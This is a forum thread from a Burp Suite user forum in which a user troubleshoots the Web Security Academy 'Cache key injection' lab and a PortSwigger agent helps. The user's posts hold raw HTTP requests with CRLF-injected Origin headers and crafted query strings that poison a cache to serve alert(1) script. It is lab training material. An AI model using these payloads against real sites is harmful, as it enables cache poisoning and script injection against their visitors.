Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Cache key injection

Cyber | Last updated: Jun 01, 2023 12:55PM UTC

Hi, I can't solve the lab. I am sending the following requests, ----- 1. ----- First request (Please note that the Origin header has been added 2 times): GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/1.1 Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ Host: 0afb003503bf820180b02bda008800cd.web-security-academy.net Cookie: session=1uh3txObzEBQpQNLO7PYdosDJ7zaWS7I; lang=en Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Pragma: x-get-cache-key Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ First response without duplicate Origin header: HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Vary: Origin X-Frame-Options: SAMEORIGIN Cache-Control: max-age=35 Age: 0 X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$ X-Cache: miss Connection: close Content-Length: 42 document.cookie = 'lang=en?utm_content=z'; First response with duplicate Origin header: HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Access-Control-Allow-Origin: x Cache-Control: max-age=35 Age: 2 X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ X-Cache: hit Connection: close Content-Length: 8 alert(1) ----- 2. ----- Second request: GET /login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/1.1 Host: 0afb003503bf820180b02bda008800cd.web-security-academy.net Cookie: session=1uh3txObzEBQpQNLO7PYdosDJ7zaWS7I; lang=en Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Referer: https://0afb003503bf820180b02bda008800cd.web-security-academy.net/login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent%2DLength:%208%250d%250a%250d%250aalert(1)$$%23 Second response: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 16 "Protocol error" HTTP is downgraded to 1.1. Thanks.

Ben, PortSwigger Agent | Last updated: Jun 02, 2023 10:04AM UTC

Hi, Is there a reason for duplicating the Origin header in the first request and duplicating the utm_content in the second? If it helps, I was able to solve the lab using the following two requests: https://snipboard.io/vEPUB3.jpg https://snipboard.io/QZwI8A.jpg Does the following video walkthrough help at all: https://www.youtube.com/watch?v=fU65sWuZPyc

Cyber | Last updated: Jun 05, 2023 09:01AM UTC

Hi Ben, I noticed that the double Origin header in the first request is not needed if the dash in the Origin header value is removed (between "Content" and "Length"). --- 1 --- Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ returns this: HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Vary: Origin X-Frame-Options: SAMEORIGIN Cache-Control: max-age=35 Age: 1 X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$ X-Cache: hit Connection: close Content-Length: 42 document.cookie = 'lang=en?utm_content=z'; --------- --- 2 --- Origin: x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$ returns this: HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Access-Control-Allow-Origin: x Cache-Control: max-age=35 Age: 0 X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$ X-Cache: miss Connection: close Content-Length: 8 alert(1) --------- Maybe there is a problem with the encoding. I tried the suggested video (https://www.youtube.com/watch?v=fU65sWuZPyc) but without much success.

Ben, PortSwigger Agent | Last updated: Jun 05, 2023 05:10PM UTC

Hi, Did you take a look at the screenshots of the example requests that I used to solve the lab? The lab appears to work as expected in line with the written solution.

Cyber | Last updated: Jun 07, 2023 08:12AM UTC

Hi, I studied the screenshots you sent but I was not able to see the differences compared to my requests. I sent requests using Postman and completed the lab. Burp: https://snipboard.io/vEY8uC.jpg https://snipboard.io/H0Jcr9.jpg Postman: https://snipboard.io/gcSE7b.jpg https://snipboard.io/7Ceznd.jpg

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.